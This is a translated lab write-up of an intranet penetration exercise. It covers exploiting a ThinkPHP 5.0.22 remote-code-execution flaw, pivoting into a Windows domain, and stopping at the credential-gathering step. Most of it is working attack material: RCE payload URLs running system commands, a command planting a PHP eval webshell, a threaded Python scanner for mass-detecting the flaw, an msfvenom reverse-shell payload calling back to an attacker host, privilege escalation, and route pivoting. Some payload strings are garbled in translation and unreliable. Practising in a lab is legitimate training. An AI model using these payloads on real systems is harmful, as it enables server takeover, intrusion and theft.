Title: A simple intranet penetration shooting range combat

0x00 Introduction

The most important idea is the process of intranet penetration. Although there are not many hosts in intranet penetration this time, it is mainly to train one's own intranet penetration.

0x01 Environment construction

Shooting Range:

win7 (inside): 192.168.138.136

win7 (external): 192.168.10.25

Domain host:

win2008:192.168.138.138

0x03 web server penetration

nmap probe port

nmap -T4 -sC -sV 192.168.10.25

Here you can see several main ports, such as 80, 135, 139, 445. First of all, you can think of the points that can be used include ipc and smb

Opened port 80 and tried to access the web address. I am old smiling, and it is still version 5.x, so there are still many holes.

In order to determine the specific version, we first use an error to view it. We found that the version here is 5.0.22. If you remember correctly, there is a tp remote command execution vulnerability here.

Vulnerability description: Because thinkphp provides form request forgery for the method method of the core Requests class in the framework, this function uses $_POST['_method'] to pass the real request method. However, since the framework does not verify the parameters, the attacker can set $_POST['_method']='__construct' to make the variables of this class overwritten. The attacker uses this method to overwrite the filter variable with function names such as system. When the parameter filtering is performed internally, he will execute arbitrary commands.

thinkphp getshell

Here I will first find out if there are any related vulnerabilities in Kali

searchsploit thinkphp

You can see that there is a 5.x remote execution vulnerability here. Go directly to this folder and check the payload listed in txt.

cd /usr/share/exploitdb/exploits/php/webapps

cat 46150.txt

After finding the corresponding version, fuzz the following payload. This is the list of the database name. Here you see the database name is root

192.168.10.25/thinkphp/public/?s=.|think\config/getname=database.username

This payload should list the database password, but it is not printed here

192.168.10.25/thinkphp/public/?s=.|think\config/getname=database.password

Here is phpinfo

192.168.10.25/?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=phpinfovars[1][]=1

Pass and see if the current permission is administrator

192.168.10.25/?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=whoami

Look at the IP situation and dual network cards, then there is a high probability that there will be a domain environment

192.168.10.25/?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=ipconfig

Look at the process and find that there is no killing software, so try to write webshell without killing

192.168.10.25/?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=tasklist/svc

Here I try to write a one-sentence Trojan here. Because I have checked before, there are no killing software or security dogs, so there is no need to do a kill-free treatment here.

192.168.10.25/?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=echo '?php @eval($_POST[cmd]);' connect.php

Use dir to verify whether the write is successful

192.168.10.25/?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=dir

Connect successfully with ant sword

thinkphp batch detection

I have thought about a question here. There are so many versions of thinkphp. If there is no vulnerability library in Kali and searching on search engines is too time-consuming, is there a script to batch detect thinkphp vulnerabilities?

Here I found a script for batch detection of thinkphp vulnerability

# !/usr/bin/env python

# -*- coding: utf-8 -*-

# name: thinkphp remote code detection

# description: ThinkPHP5 5.0.22/5.1.29 Remote Code Execution Vulnerability

import re

import sys

import requests

import queue

import threading

from bs4 import BeautifulSoup

class thinkphp_rce(threading.Thread):

def __init__(self, q):

threading.Thread.__init__(self)

self.q=q

def run(self):

While not self.q.empty():

url=self.q.get()

headers={'User-Agent':'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50'}

payload=r'/?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=phpinfovars[1][]=1'

vulnurl=url + payload

try:

response=requests.get(vulnurl, headers=headers, timeout=3, verify=False, allow_redirects=False)

soup=BeautifulSoup(response.text,'lxml')

if 'PHP Version' in str(soup.text):

print ('[+] Remote code execution vulnerability exists at the target address')

print ('[+] Vulnerability url address ' + vulnurl)

with open('target.txt','a') as f1:

f1.write(vulnurl+'\n')

f1.close()

else:

print ('[-] There is no remote code execution vulnerability in the target address')

except:

print ('[!] Destination address cannot be connected')

def urlget():

with open('url.txt','r')as f:

urls=f.readlines()

for tmp in urls:

if '//' in tmp:

url=tmp.strip('\n')

urlList.append(url)

else:

url='http://'+tmp.strip('\n')

urlList.append(url)

return(urlList)

f.close()

if __name__=='__main__':

print('''--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

*Made by :tdcoming

*For More :https://t.zsxq.com/Ai2rj6E

*MY Heart :https://t.zsxq.com/A2FQFMN

________ _

|__ __| | | (_)

| | __| | ____ ___ ___ ___ __ ___ __ __ __ _

| |/_` |/__|/_ \ | '_ ` _ \ | || '_ \/_` |

| || (_| || (__| (_) || | | | | | | | | | | | | | | | | | | | | | | | | | | |

|_| \__,_| \___|\___/|_| |_| |_| |_||_| |_| |_| \__, |

__/|

|___/

''')

urlList=[]

urlget()

threads=[]

threads_count=10

q=queue.Queue()

for url in urlList:

q.put(url)

for i in range(threads_count):

threads.append(thinkphp_rce(q))

for i in threads:

i.start()

for i in threads:

i.join()

The method here is very simple: put the target to be detected in url.txt, and if there is a vulnerability address, a target.txt text will be automatically generated and saved.

0x04 Intranet information collection

Here we use the command window of the Ant Sword to collect the information of the machine, which is administrator permission + dual network card

Whoamiipconfig

Check out the domain related information

net viewnet config workstationnet user /domain

0x05 Intranet penetration

Online msf

msf generates an abc.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f exe abc.exe

Upload to the target machine using an ant sword

Because there is no killing software here, you don’t need to do it without killing, just execute it on the command line.

msf enables monitoring and can be online

Information Collection

Use getsystem to increase authority to system. This is because it is a shooting range, getsystem is easier to execute successfully.

After elevating the authority, obtain a shell in the Windows environment to continue collecting information on the domain.

chcp 65001net user /domainnet group 'domain computers' /domainnet group 'domain controllers' /domainnet group 'domain admins' /domain

The target machine has a domain environment called "sun", and there is only one domain control. Here I ping the domain control directly to get the domain control ip is 192.168.138.138

Get credentials

Here, because there are two network segments, add the route first to facilitate subsequent operations

# msf operation route add 192.168.138.0 255.255.255.0 2route print # session operation run autoroute -s 192.168.138.0/24run autoroute -p